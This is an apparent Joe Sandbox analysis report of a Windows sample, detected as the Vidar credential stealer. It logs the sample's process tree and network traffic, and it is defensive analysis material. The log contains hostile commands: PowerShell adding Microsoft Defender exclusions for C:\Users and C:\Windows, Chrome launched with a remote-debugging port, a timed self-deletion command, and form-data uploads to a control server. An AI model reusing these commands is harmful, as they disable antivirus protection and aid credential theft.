                                                                                                                                                                      2024-12-04 16:05:38 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 54 30 48 44 4a 45 33 45 43 32 56 41 49 4d 37 47 4c 4e 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 54 30 48 44 4a 45 33 45 43 32 56 41 49 4d 37 47 4c 4e 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 54 30 48 44 4a 45 33 45 43 32 56 41 49 4d 37 47 4c 4e 4f 38 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------T0HDJE3EC2VAIM7GLNO8Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------T0HDJE3EC2VAIM7GLNO8Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------T0HDJE3EC2VAIM7GLNO8Cont
                                                                                                                                                                      2024-12-04 16:05:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:39 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:11:03:52
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Ttok18.exe"
                                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                                      File size:22'020'096 bytes
                                                                                                                                                                      MD5 hash:3544B39481484F67F807E54DD58A93D6
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:11:03:53
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:11:03:57
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"
                                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:11:03:57
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:11:03:58
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE
                                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:11:04:01
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:11:04:01
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:11:04:02
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
                                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:11:04:06
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:11:04:06
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:11:04:07
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
                                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:15
                                                                                                                                                                      Start time:11:04:23
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:476'160 bytes
                                                                                                                                                                      MD5 hash:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 45%, ReversingLabs
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:11:04:39
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:11:04:40
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:11:04:40
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2180,i,4947375458311631145,18082190832004734882,262144 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:11:05:39
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:11:05:39
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:11:05:39
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:timeout /t 10
                                                                                                                                                                      Imagebase:0x550000
                                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:23.5%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:3
                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                        execution_graph 3051 11e1170 3052 11e11b2 GetConsoleWindow 3051->3052 3053 11e11f2 3052->3053

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 73 11e0a40-11e0a68 74 11e0a6f-11e0ac5 call 11e10e0 call 11e1317 73->74 75 11e0a6a 73->75 78 11e0ac7-11e0ad0 74->78 79 11e0ad5-11e0ccc 74->79 75->74 82 11e1091-11e10d6 78->82 111 11e0daf-11e0dc3 79->111 112 11e0dc9-11e0dde 111->112 113 11e0cd1-11e0d17 111->113 116 11e0e5b-11e0e77 112->116 117 11e0d1e-11e0d51 113->117 118 11e0d19 113->118 119 11e0e7d-11e0e95 116->119 120 11e0de0-11e0e1f 116->120 125 11e0d58-11e0dac 117->125 126 11e0d53 117->126 118->117 122 11e0ede-11e0f1c call 11e013c 119->122 123 11e0e97-11e0edb 119->123 128 11e0e26-11e0e3e 120->128 129 11e0e21 120->129 141 11e0f24-11e0fa2 call 11e014c 122->141 123->122 125->111 126->125 138 11e0e46-11e0e58 128->138 129->128 138->116 148 11e102e-11e1036 141->148 149 11e0fa8-11e102c 141->149 152 11e1037-11e1038 148->152 149->152 152->82
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997998903.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11e0000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: a^q
                                                                                                                                                                        • API String ID: 0-3411664965
                                                                                                                                                                        • Opcode ID: 663eece13379a3fd4446772b578fd433b3928e6c5d8b528f3e233d87a55a0bdc
                                                                                                                                                                        • Instruction ID: 6f3ed4e14880a8ee6a21fce26cb215b496faf4d8a40e57b87326e8d38ac9c4ce
                                                                                                                                                                        • Opcode Fuzzy Hash: 663eece13379a3fd4446772b578fd433b3928e6c5d8b528f3e233d87a55a0bdc
                                                                                                                                                                        • Instruction Fuzzy Hash: 7412CA74E00229CFDB14DFA9D984A9DBBF2FF88301F108559E918AB359DB74A985CF40

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 415 11e2309-11e2340 416 11e2347-11e23d9 415->416 417 11e2342 415->417 422 11e25c8-11e25d1 416->422 417->416 423 11e23de-11e23e7 422->423 424 11e25d7-11e25de 422->424 425 11e23ee-11e24fb call 11e19ac call 11e19bc 423->425 426 11e23e9 423->426 444 11e24fd-11e2518 425->444 445 11e2525-11e2540 425->445 426->425 449 11e2520-11e2523 444->449 450 11e2541-11e255c 445->450 449->450 452 11e255e 450->452 453 11e2568 450->453 454 11e2567 452->454 453->422 454->453
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997998903.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11e0000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 35613d85f136e564bc7dfd5e20a9ce398c53d15f4e88093da15895197815c0d5
                                                                                                                                                                        • Instruction ID: 30423c428a602f741238626ae69352857ddeb9178670cbfc8d5f4366cd9e3248
                                                                                                                                                                        • Opcode Fuzzy Hash: 35613d85f136e564bc7dfd5e20a9ce398c53d15f4e88093da15895197815c0d5
                                                                                                                                                                        • Instruction Fuzzy Hash: C4811574E01209DFDB18DFA9D994ADDBBB2FF89300F208129D805AB354DB34A886CF54

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 160 11e1168-11e11aa 162 11e11b2-11e11f0 GetConsoleWindow 160->162 163 11e11f9-11e1225 162->163 164 11e11f2-11e11f8 162->164 164->163
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997998903.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11e0000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2863861424-0
                                                                                                                                                                        • Opcode ID: ddc78f11b732a519f8d646ccc8d35de8661cb4117532f3ba62d53a1944d68853
                                                                                                                                                                        • Instruction ID: c07cebba879d3111e233e9a26f869e51e6b76ba9bef74ebb50e1fe3d796e289f
                                                                                                                                                                        • Opcode Fuzzy Hash: ddc78f11b732a519f8d646ccc8d35de8661cb4117532f3ba62d53a1944d68853
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D219AB8D012189FCB04CFA9D984ADEBBF4FB49314F20905AE818B7350D775A945CFA5

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 167 11e1170-11e11f0 GetConsoleWindow 169 11e11f9-11e1225 167->169 170 11e11f2-11e11f8 167->170 170->169
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997998903.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11e0000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2863861424-0
                                                                                                                                                                        • Opcode ID: 07fad4f3952788e2b1f39266c11a6fe937b8fea2866bfd59269583ca2d5aeb40
                                                                                                                                                                        • Instruction ID: cf3ea57101c1e0cd85a85d8e87e37c5be1847aea33521f1d4cfbb6f9cf65f9cc
                                                                                                                                                                        • Opcode Fuzzy Hash: 07fad4f3952788e2b1f39266c11a6fe937b8fea2866bfd59269583ca2d5aeb40
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C21A9B8D002189FCB04CFA9D984ADEFBF4BB49320F20905AE808B7350D735A945CFA5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997394920.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_118d000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4a85d56e5278404ad7370679597bd7d63948385a526cd2037c3a032fc0541a7b
                                                                                                                                                                        • Instruction ID: 8def6ba4bc0a9e7a2a66566660df3087c9e0e12ab7981639f58dc4c1baf856c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 4a85d56e5278404ad7370679597bd7d63948385a526cd2037c3a032fc0541a7b
                                                                                                                                                                        • Instruction Fuzzy Hash: D501F7710047849AEB28BA59EC84B26BFD8DF51329F18C45AEE090B2C2C7789840CA72
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997394920.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_118d000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4292218fe143d1cd1e73ff88607f4a12865cd9a9ae21811459b20ff49d858064
                                                                                                                                                                        • Instruction ID: aa6b4c4a4c2ef2699b8da1608dfe1af1634c11c9ae7a870c3b0887d00e9f5a49
                                                                                                                                                                        • Opcode Fuzzy Hash: 4292218fe143d1cd1e73ff88607f4a12865cd9a9ae21811459b20ff49d858064
                                                                                                                                                                        • Instruction Fuzzy Hash: C7F0C2714043809AEB249E1ADC88B62FF98EB41234F18C15EED480B2C6C3789840CAB1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.1774764349.00000000040ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 040ED000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_40ed000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e23b549a1a1ebe593ee5e6105ed5d425698c5c89e438c1d417c760c0db0cd91c
                                                                                                                                                                        • Instruction ID: 04e1b836e9a6efd082e73fc78c98e836db61e1e26e4642dd763c7671136fb597
                                                                                                                                                                        • Opcode Fuzzy Hash: e23b549a1a1ebe593ee5e6105ed5d425698c5c89e438c1d417c760c0db0cd91c
                                                                                                                                                                        • Instruction Fuzzy Hash: 26015E6200E3C09EE7529B259D94B62BFB4DF53224F1D81CBD9889F1A3C2696849C772
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.1774764349.00000000040ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 040ED000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_40ed000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 342cc7144d8c7a6385f4d3cb574b96d15ee5f42131fdec2c2aafd2e3d8cc2388
                                                                                                                                                                        • Instruction ID: ee585e787540701d4f00f0fd52c64582f38ab91efef7f456e2fbcd366db680d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 342cc7144d8c7a6385f4d3cb574b96d15ee5f42131fdec2c2aafd2e3d8cc2388
                                                                                                                                                                        • Instruction Fuzzy Hash: D801F2711083419EE7609E2AEC84B7ABFD8DF51325F0CC41AED182B282C679A841D7B2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.1774998761.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_4150000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 33f0103b4be8816b7ae670be06d20a6a3eead2e684a825b4cd9658caaca15fd5
                                                                                                                                                                        • Instruction ID: 68669f7f1f1a6d4bea672ffe9c4f8b38f671e72457055201fe4df8cf4e21094d
                                                                                                                                                                        • Opcode Fuzzy Hash: 33f0103b4be8816b7ae670be06d20a6a3eead2e684a825b4cd9658caaca15fd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 58F0DA35A001059FCB15CF9DD890AEEF7B1FF88324F248199E565A72A1C736EC52CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7f58cf36953204b38a1a930908004b631fdeafa7867f9b4f9ceb7006b7d14afc
                                                                                                                                                                        • Instruction ID: 496d2f9f5e6046b27446053c70786983f324f96b542ff39abf09e496ea9624e6
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f58cf36953204b38a1a930908004b631fdeafa7867f9b4f9ceb7006b7d14afc
                                                                                                                                                                        • Instruction Fuzzy Hash: 04915FB5B007155BDB1AEFB4C4146BFBAE2EF84704B00891DD10AAB344EF74690A8BC6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
